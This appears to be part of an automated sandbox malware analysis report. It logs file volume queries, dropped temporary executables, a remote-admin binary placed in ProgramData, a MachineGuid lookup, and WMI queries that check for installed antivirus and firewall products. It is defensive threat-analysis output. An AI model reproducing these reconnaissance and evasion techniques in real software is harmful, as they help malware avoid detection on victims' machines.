Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Immunity\rutserv.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_0060C5F8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,

19_2_0060C5F8

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041C4F8 GetLocalTime,

17_2_0041C4F8

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A7114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

17_2_004A7114

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
